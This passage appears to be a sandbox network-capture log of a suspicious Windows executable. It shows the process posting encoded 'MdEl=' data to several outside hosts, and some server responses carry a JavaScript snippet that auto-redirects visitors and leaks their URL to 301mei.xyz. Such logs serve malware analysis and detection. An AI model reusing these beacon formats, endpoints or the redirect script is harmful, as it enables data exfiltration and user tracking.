MdEl=hwyLeKEWTw8xHNgt+vd7cI5W7QwLwgnjhQA0vduD9HotKEt9WuYTlUxDHPqctKnQjjlQDTPPjyyWtmPa6scqM1FeQDlGl8oSQt37TeV1SlFEYh7GCnxEqQ1bFkNhghRMff8oW3JOmzqJVUI+PjUx0mkxfnGB7ZKwURULnh3WaXALfsW4AUbMl1bdoIhDMY326UG9PexVoITavNG40VQcYVE=
Jul 8, 2024 07:22:33.654318094 CEST	552	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 423 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	103.176.91.154	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:35.365649939 CEST	10801	OUT	POST /8c7z/ HTTP/1.1 Host: www.334es.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.334es.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.334es.com/8c7z/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 48 4e 67 74 2b 76 64 37 63 49 35 57 37 51 77 4c 77 67 6e 6a 68 51 41 30 76 64 75 44 39 48 51 74 4b 56 4e 39 51 4e 67 54 6b 55 78 44 45 50 71 42 74 4b 6e 5a 6a 6a 74 63 44 53 79 30 6a 30 2b 57 2f 55 58 61 7a 2b 6b 71 47 31 46 65 50 54 6c 48 6f 63 6f 48 51 70 54 2f 54 66 6c 31 53 6c 46 45 59 69 54 47 52 57 78 45 6f 51 31 63 43 6b 4e 74 33 78 52 6b 66 63 4d 34 57 32 39 65 6c 44 4b 4a 55 30 59 2b 4d 52 38 78 6f 32 6b 7a 63 6e 47 5a 37 5a 47 56 55 52 59 35 6e 68 7a 77 61 56 63 4c 64 4a 76 79 61 56 4c 30 6b 30 33 6e 2b 70 67 6f 4e 72 61 30 38 55 43 49 4b 4e 6c 2f 2f 59 6e 73 6a 4e 72 50 74 58 4d 2b 4c 67 53 62 76 66 61 59 62 72 58 4a 33 47 6b 35 6c 58 61 56 69 4b 4d 38 79 39 4b 4c 38 56 35 6f 77 54 43 68 70 5a 49 62 67 65 6a 4f 4f 6d 4a 41 55 75 34 6f 42 6a 73 2b 76 39 44 63 7a 65 6b 62 34 51 59 6d 74 53 74 2b 59 34 58 68 57 68 6c 72 31 59 79 68 31 61 30 78 65 38 2f 47 59 54 33 2b 2f 7a 6f 66 2f 78 55 63 49 4a 4e 32 45 47 4d 58 49 52 71 4a 64 32 72 47 53 [TRUNCATED] Data Ascii: MdEl=hwyLeKEWTw8xHNgt+vd7cI5W7QwLwgnjhQA0vduD9HQtKVN9QNgTkUxDEPqBtKnZjjtcDSy0j0+W/UXaz+kqG1FePTlHocoHQpT/Tfl1SlFEYiTGRWxEoQ1cCkNt3xRkfcM4W29elDKJU0Y+MR8xo2kzcnGZ7ZGVURY5nhzwaVcLdJvyaVL0k03n+pgoNra08UCIKNl//YnsjNrPtXM+LgSbvfaYbrXJ3Gk5lXaViKM8y9KL8V5owTChpZIbgejOOmJAUu4oBjs+v9Dczekb4QYmtSt+Y4XhWhlr1Yyh1a0xe8/GYT3+/zof/xUcIJN2EGMXIRqJd2rGSzR0nLnZ41B4MSPS6Jg0jsWtxdPjq4RlRFnQd8+8P1ViqKUAo2OVHGuikxzxT6WWPkWzJ3/qqBKapcQpw7WWNXTkWqMCfKnCG9PXLIgQey058G3tCwhRutgN0OCXe4VGWBhLgHJM3HwPriwvEsKp4sW0mMBj1XBhf0fFG6OWpnwd9hjPVcKJJpa7gJQVBo0nEinQNUGXD/q/E9AN08ih0igZ6R3RbwbUcUQNPxDXE65koJwx4aYuLr+9WmyUG4ljlB+8apOkpwayB8kopwVLV3LvCH91WdVimy0ZuSx51PFlNw7oc76XJhkPLTGFucLCri+8lxJPhrajr5QImCoyomzQvrudprFDplOpca2zCarRR7jIRMRpA2Atmz8oDUyJU9zG+rrN4iuY47dqVV5G4a4CiUJGsB0Vbw0hRtWJxjuULgNR6uV2kuyHg+cF9FzK9JW1LAeyj0y0hz+j0fREQWVRDo2vgPeZKGPeIcXoUUvhRnDhzHlD5bSaVzNyVHgCOvzhc41GsXHJ7fv0vyq0yTSRPPJsfBI9Z41rZTLvqUjyDobKXn2jPmH/vQeqqwB8Yeg5T1rrnsMtMl6tUhGTC1LZuxPxxf0rYW17C5LyP4D6P6uM68O6FRct2dOoqQE5nlVqwsmmSE3RxZ4imtAAQ6LSWfJuWOrFqbH [TRUNCATED]
Jul 8, 2024 07:22:36.170408010 CEST	552	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 423 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	103.176.91.154	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:37.893135071 CEST	447	OUT	GET /8c7z/?MdEl=syard6w4RGgVSvsize8tVtoRwRwiqlTl/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVagwsKCpAvqMMVe/9cP8qS2tqU0eEbGFFph0=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.334es.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:22:38.684381008 CEST	552	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 423 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	5.78.41.174	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:43.777719975 CEST	714	OUT	POST /6rlx/ HTTP/1.1 Host: www.411divorce.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.411divorce.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.411divorce.com/6rlx/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 64 30 78 67 47 4a 4a 54 4f 4d 6c 6b 38 72 54 71 7a 52 56 6a 34 56 30 57 42 6b 53 68 5a 4f 4a 50 4c 71 34 33 66 65 67 31 62 36 4f 54 33 7a 53 4c 71 35 51 49 43 79 59 4c 79 31 4c 76 4f 62 76 66 75 65 6f 6e 4b 76 53 5a 34 48 66 34 53 5a 4e 33 59 39 72 70 34 68 63 79 75 4e 61 73 76 54 74 51 76 64 56 32 4a 5a 33 48 50 77 56 45 76 4f 78 45 39 72 4b 32 37 61 37 70 64 70 44 79 73 41 47 38 4e 6e 33 67 64 38 41 77 56 53 54 57 62 61 7a 56 36 38 4d 36 77 6b 6b 4b 47 38 61 39 30 54 49 41 47 61 49 70 78 30 6d 48 57 57 59 55 66 75 46 64 42 74 35 74 6b 59 30 75 6a 42 46 34 30 61 6a 44 6f 41 3d 3d Data Ascii: MdEl=d0xgGJJTOMlk8rTqzRVj4V0WBkShZOJPLq43feg1b6OT3zSLq5QICyYLy1LvObvfueonKvSZ4Hf4SZN3Y9rp4hcyuNasvTtQvdV2JZ3HPwVEvOxE9rK27a7pdpDysAG8Nn3gd8AwVSTWbazV68M6wkkKG8a90TIAGaIpx0mHWWYUfuFdBt5tkY0ujBF40ajDoA==
Jul 8, 2024 07:22:44.838641882 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:22:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: public, no-cache Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/" X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: Prometheus Pre-Cognitive-Push: Enabled Quantum-Flux-Capacity: Omega Referrer-Policy: strict-origin-when-cross-origin X-Grid-SRCache-TTL: 2592000 X-Grid-SRCache-Skip: -POST X-Grid-SRCache-Fetch: BYPASS X-Grid-SRCache-Store: BYPASS Content-Encoding: gzip Data Raw: 34 62 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 7b db 36 d2 e8 e7 f8 79 f6 3f a0 4a 5b db 2d 29 51 57 db 52 ec dd 34 4d da 9c 6d 9b 6e 93 34 dd 5e 1e 3d 94 08 49 8c 29 52 25 29 5f ea f5 f9 2d e7 eb f9 72 7e c4 fb cb ce cc 00 24 41 12 d4 c5 97 d4 fb ee eb 36 b6 04 0c 06 33 03 60 30 00 06 83 27 1f 7d f9 ea d9 9b 7f 7e ff 9c cd e2 b9 77 b2 f3 04 ff 30 cf f6 a7 c7 35 ee 9b 6f 5f d7 30 8d db ce c9 ce a3 27 73 1e db 6c 3c b3 c3 88 c7 c7 b5 b7 6f 5e 98 87 35 d6 00 00 ca 98 c5 f1 c2 e4 bf 2f dd b3 e3 da 4f e6 db a7 e6 b3 60 be b0 63 77 e4 f1 1a 1b 07 7e cc 7d 28 f5 f2 f9 31 77 a6 bc 86 f8 3c d7 3f 65 21 f7 8e 6b 0b d7 9f 8e ec f1 69 8d cd 42 3e 39 ae 21 ae 7e a3 d1 69 36 1d f7 2c 08 c7 bc 3e 0e e6 8d 8b b9 17 2e c6 f5 c5 6c 41 d5 02 86 68 1c ba 8b 98 c5 97 0b 7e 5c 8b f9 45 dc 78 6f 9f d9 22 15 ab 78 e4 04 e3 e5 1c 2a ae 27 1f 9e 7b 9c be 8f 3d 3b 8a be b3 e7 9c 1d b3 dd f7 d1 ee 00 b0 35 44 41 28 07 5f 62 37 f6 f8 49 c7 ea b0 ef 82 98 bd 08 96 be c3 fe c5 5e 3f 7f c5 de 60 0e fb 9a 87 fc 49 43 40 [TRUNCATED] Data Ascii: 4b6f}k{6y?J[-)QWR4Mmn4^=I)R%)_-r~$A63`0'}~w05o_0'sl<o^5/O`cw~}(1w<?e!kiB>9!~i6,>.lAh~\Exo"x'{=;5DA(_b7I^?`IC@8V O2F@,aEAN]8zu@fVl?2]8j'+d{}V@S7"_'.__~I?OCRc}8#Vy-<8:6!{:nb{oS?8_^gOq>7
Jul 8, 2024 07:22:44.838674068 CEST	1236	IN	Data Raw: bf 7e f3 ed 37 06 f3 dc 53 ce be e2 e3 d3 60 9f bd b6 27 76 e8 4a 80 2f ed e5 bc d1 81 0f 9f 35 fe 86 12 31 27 f6 98 b3 2b f9 11 05 d1 67 bb 28 0a 86 a2 d8 1d 50 06 c9 bd cf 04 b3 22 e9 9c bb d3 19 90 09 5c 27 30 21 8f c7 b3 3e f3 83 70 6e 7b 22 Data Ascii: ~7S`'vJ/51'+g(P"\'0!>pn{"Qg }oDlQlYj/o_}9^~~7sNw?v?q<g'%?;?a~~X~{U>{]`
Jul 8, 2024 07:22:44.838685989 CEST	448	IN	Data Raw: fd 2b 98 fb 96 a1 5f 80 ac d7 eb 6a 82 11 26 45 af 8d 8f 6f 54 fa e3 eb c1 39 ed 54 d4 25 09 e2 8f 21 13 3f 96 df 07 48 f4 78 09 ed 3c ff 9a db ce 6b 62 27 3a fe a8 39 10 f9 f5 89 2f 21 eb a0 d5 e2 80 d8 bf 02 a2 aa 32 64 9a 1f 3c 0b fc 09 a8 8c Data Ascii: +_j&EoT9T%!?Hx<kb':9/!2d<8G;Q#h2r})!%NhMJv!7+8HDlZ=4vnm!AH0Ad/p6RYx\;OCe0`/`>[9F~3U>v}
Jul 8, 2024 07:22:44.838728905 CEST	1236	IN	Data Raw: b1 4e e8 c7 ee 5d 17 40 af e6 b0 d8 70 fd be c5 2c d6 e4 73 25 1b a7 d0 ab 51 10 c2 44 da 6f 2e 2e 58 14 78 ae c3 1e 8f c7 e3 81 48 35 43 db 71 97 51 bf 03 14 aa 8b ba 6f b9 ef 05 06 e8 53 28 61 47 c6 3c f0 ed 71 80 7f 82 68 01 2b c0 c1 02 26 62 Data Ascii: N]@p,s%QDo..XxH5CqQoS(aG<qh+&b0C>/#LjdB%P^dNp~w@jhxZE@uwY,=\*nw8X(2ge H7]}EleLuc[4Ws&a{r}/m0rbmLrJ
Jul 8, 2024 07:22:44.838741064 CEST	1236	IN	Data Raw: c9 59 01 d2 26 90 de c1 0a 90 0e 80 34 57 e4 77 31 bf de 5d 01 d1 03 88 16 58 61 2b 40 0e 00 a4 5d 6f 1f ae 00 39 04 90 6e dd ea 69 40 66 b6 13 9c 9b a6 6f c7 cb 10 ef b0 83 e8 e8 df 11 fc 23 0d 6e 19 4c fe 5f 6f 15 5b 31 29 ed 70 be 00 4e 70 29 Data Ascii: Y&4Ww1]Xa+@]o9ni@fo#nL_o[1)pNp)Et4Y5{/n8Xo:U5C7ZIF]1iK#SXVPM<#>V;auZPrxCXnZ(C@_S^@,he>9d.P(]
Jul 8, 2024 07:22:44.838753939 CEST	1236	IN	Data Raw: f8 ec a3 9d 37 e4 4d 8c af 29 f4 19 5e a9 93 09 6f 7f 78 29 9e 27 00 fe ce cf cf eb a0 90 a6 d0 ad c9 f7 58 3c 4f 20 af ef 10 6f 8d 9d 1f 79 18 d1 31 4d a7 de ea d5 ad 9d 2f b9 b8 f1 48 69 af e7 e8 4f cc 5e 80 5a c0 0b d4 75 f6 05 4c fc b1 3b 59 Data Ascii: 7M)^ox)'X<O oy1M/HiO^ZuL;Yzub`28e<Ce\H&\|w+!&o<vJJo7<M1\|cmQh0/80;D12F FjsDC`tc83o>
Jul 8, 2024 07:22:44.838766098 CEST	1236	IN	Data Raw: 46 32 0b ff d5 6d 2f ae c3 8c 4e a1 9e 8c 3a cc f3 30 52 fc 29 2c 4d 6c a3 8e 5b 0b 80 18 cc f8 e2 94 41 a4 11 c1 26 59 b1 8a 65 54 68 59 01 ff 18 fa b5 9f 2c ad f4 1d 13 24 99 4e ab 42 d6 87 20 6a 55 f2 e4 1b 2d 85 2a ac a0 d2 65 70 9c 77 c5 cc Data Ascii: F2m/N:0R),Ml[A&YeThY,$NB jU-epw}eUHg2aTM]7(OtCK'eb?<]IVMtbkKvnu>n].GswlC&axgWs^5Hf7_U3i^*y,K"m_6(Vx
Jul 8, 2024 07:22:44.838941097 CEST	1236	IN	Data Raw: 83 70 e3 53 40 45 78 8f 25 33 57 5a 01 6d c3 e1 1a b9 62 9a 34 72 87 68 e4 f6 fd 78 66 8e 31 d4 f2 5e c7 ff bc b9 2f b7 9d 73 b2 5a 84 30 b5 af 94 8f ca 15 9a ca e2 a9 0b 18 0d a1 09 d2 59 46 dc 3c 73 a3 a5 ed 99 72 0c 33 3b 21 5d b5 3e 9e bf 11 Data Ascii: pS@Ex%3WZmb4rhxf1^/sZ0YF<sr3;!]>;^b.Wkuk1Pk?RLX*-2r16<nYDM1nG<7,k9Vi4G3>]s]w3ot$1p4e.LSRG/!0NoWA
Jul 8, 2024 07:22:44.838954926 CEST	1236	IN	Data Raw: 73 70 95 3f 1f 2d c1 f0 06 e9 b0 39 6c b3 59 d3 28 26 76 74 89 5d 5d 62 af 9c d8 22 c8 a2 e7 b8 a6 de 96 ae de 72 62 57 97 d8 2b 27 52 bd 39 8f f5 b6 be de b6 ae de 72 62 57 97 d8 2b 27 52 bd ed c2 cc a1 ab b7 a3 ab b7 9c d8 d5 25 f6 ca 89 54 6f Data Ascii: sp?-9lY(&vt]]b"rbW+'R9rbW+'R%To^SoWWo9KrbW+'RL/eEJW-f2UnUFOxH6)<^7pV'J1BrG-)CS_R-fD@6-UU1f6Kq^Y
Jul 8, 2024 07:22:44.838967085 CEST	1236	IN	Data Raw: e1 60 2d 40 19 53 ee e8 4d 9f 7c fd b7 a4 58 d6 97 51 fe 5f d0 74 9f eb c0 f9 d3 19 3a 72 a1 4f 18 4d e9 9f 7b 4d 1c cb 95 39 b9 5e b7 1a 91 55 81 c6 da bf 56 07 dc 03 26 52 2f d1 6f 70 df 75 53 52 7f da 33 ab 68 95 59 1b 13 fb 53 05 b1 3f e9 24 Data Ascii: `-@SM\|XQ_t:rOM{M9^UV&R/opuSR3hYS?$@K]jbOF<-Re>;Q/~s3u[p9;RRy5[<7)LoW\|sQ,oRoF!jorYUo%*vMnS
Jul 8, 2024 07:22:44.843923092 CEST	1236	IN	Data Raw: 38 51 d0 3c 77 dc f8 ed 0f 2f 6b 52 38 f8 2e 1b de 66 87 ba 1b 61 e4 7c 7e 31 f7 20 0b dd e9 8f 6b 3f bc fe 72 75 15 00 1c 2e c6 f5 c5 6c f1 57 28 5b 23 0d 42 21 7a 41 b9 43 79 f1 bc 5f 1c 84 35 26 85 77 5c 7b 07 b6 ef f7 f8 22 1c eb d5 bb f5 6e Data Ascii: 8Q<w/kR8.fa\|~1 k?ru.lW([#B!zACy_5&w\{"n-{A[E/(N!i\9C?}Ze9""4\>TK/C6p8;fa#_.{#U0SxT"&FcenI<{o}F"RXhg\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	5.78.41.174	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:46.318861008 CEST	734	OUT	POST /6rlx/ HTTP/1.1 Host: www.411divorce.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.411divorce.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.411divorce.com/6rlx/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 64 30 78 67 47 4a 4a 54 4f 4d 6c 6b 7a 72 44 71 78 32 68 6a 78 56 30 52 63 55 53 68 41 2b 49 45 4c 71 6b 33 66 66 30 6c 62 4a 6d 54 77 53 69 4c 74 37 6f 49 44 79 59 4c 39 56 4c 51 4e 72 75 52 75 65 6c 61 4b 71 79 5a 34 48 62 34 53 59 39 33 5a 4f 43 2f 34 78 63 73 68 74 61 79 72 54 74 51 76 64 56 32 4a 59 48 70 50 77 39 45 76 64 35 45 79 70 79 78 6b 71 37 6d 4a 35 44 79 6e 67 47 77 4e 6e 33 47 64 35 5a 64 56 52 37 57 62 61 44 56 36 74 4d 39 2f 6b 6b 45 43 38 62 6c 77 42 39 76 65 62 74 62 79 6b 71 6e 52 30 64 78 58 49 55 48 51 63 59 36 32 59 51 64 2b 47 4d 4d 35 5a 65 4b 7a 4c 59 6a 6c 5a 37 48 34 69 6f 78 62 70 4a 73 58 74 74 70 41 78 73 3d Data Ascii: MdEl=d0xgGJJTOMlkzrDqx2hjxV0RcUShA+IELqk3ff0lbJmTwSiLt7oIDyYL9VLQNruRuelaKqyZ4Hb4SY93ZOC/4xcshtayrTtQvdV2JYHpPw9Evd5Eypyxkq7mJ5DyngGwNn3Gd5ZdVR7WbaDV6tM9/kkEC8blwB9vebtbykqnR0dxXIUHQcY62YQd+GMM5ZeKzLYjlZ7H4ioxbpJsXttpAxs=
Jul 8, 2024 07:22:47.332462072 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:22:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: public, no-cache Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/" X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: Prometheus Pre-Cognitive-Push: Enabled Quantum-Flux-Capacity: Omega Referrer-Policy: strict-origin-when-cross-origin X-Grid-SRCache-TTL: 2592000 X-Grid-SRCache-Skip: -POST X-Grid-SRCache-Fetch: BYPASS X-Grid-SRCache-Store: BYPASS Content-Encoding: gzip Data Raw: 34 62 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 7b db 36 d2 e8 e7 f8 79 f6 3f a0 4a 5b db 2d 29 51 57 db 52 ec dd 34 4d da 9c 6d 9b 6e 93 34 dd 5e 1e 3d 94 08 49 8c 29 52 25 29 5f ea f5 f9 2d e7 eb f9 72 7e c4 fb cb ce cc 00 24 41 12 d4 c5 97 d4 fb ee eb 36 b6 04 0c 06 33 03 60 30 00 06 83 27 1f 7d f9 ea d9 9b 7f 7e ff 9c cd e2 b9 77 b2 f3 04 ff 30 cf f6 a7 c7 35 ee 9b 6f 5f d7 30 8d db ce c9 ce a3 27 73 1e db 6c 3c b3 c3 88 c7 c7 b5 b7 6f 5e 98 87 35 d6 00 00 ca 98 c5 f1 c2 e4 bf 2f dd b3 e3 da 4f e6 db a7 e6 b3 60 be b0 63 77 e4 f1 1a 1b 07 7e cc 7d 28 f5 f2 f9 31 77 a6 bc 86 f8 3c d7 3f 65 21 f7 8e 6b 0b d7 9f 8e ec f1 69 8d cd 42 3e 39 ae 21 ae 7e a3 d1 69 36 1d f7 2c 08 c7 bc 3e 0e e6 8d 8b b9 17 2e c6 f5 c5 6c 41 d5 02 86 68 1c ba 8b 98 c5 97 0b 7e 5c 8b f9 45 dc 78 6f 9f d9 22 15 ab 78 e4 04 e3 e5 1c 2a ae 27 1f 9e 7b 9c be 8f 3d 3b 8a be b3 e7 9c 1d b3 dd f7 d1 ee 00 b0 35 44 41 28 07 5f 62 37 f6 f8 49 c7 ea b0 ef 82 98 bd 08 96 be c3 fe c5 5e 3f 7f c5 de 60 0e fb 9a 87 fc 49 43 40 [TRUNCATED] Data Ascii: 4b6f}k{6y?J[-)QWR4Mmn4^=I)R%)_-r~$A63`0'}~w05o_0'sl<o^5/O`cw~}(1w<?e!kiB>9!~i6,>.lAh~\Exo"x'{=;5DA(_b7I^?`IC@8V O2F@,aEAN]8zu@fVl?2]8j'+d{}V@S7"_'.__~I?OCRc}8#Vy-<8:6!{:nb{oS?8_^gOq>7
Jul 8, 2024 07:22:47.332488060 CEST	224	IN	Data Raw: bf 7e f3 ed 37 06 f3 dc 53 ce be e2 e3 d3 60 9f bd b6 27 76 e8 4a 80 2f ed e5 bc d1 81 0f 9f 35 fe 86 12 31 27 f6 98 b3 2b f9 11 05 d1 67 bb 28 0a 86 a2 d8 1d 50 06 c9 bd cf 04 b3 22 e9 9c bb d3 19 90 09 5c 27 30 21 8f c7 b3 3e f3 83 70 6e 7b 22 Data Ascii: ~7S`'vJ/51'+g(P"\'0!>pn{"Qg }oDlQlYj/o_}9^~~7sNw?v?q<g'%?;?a~~
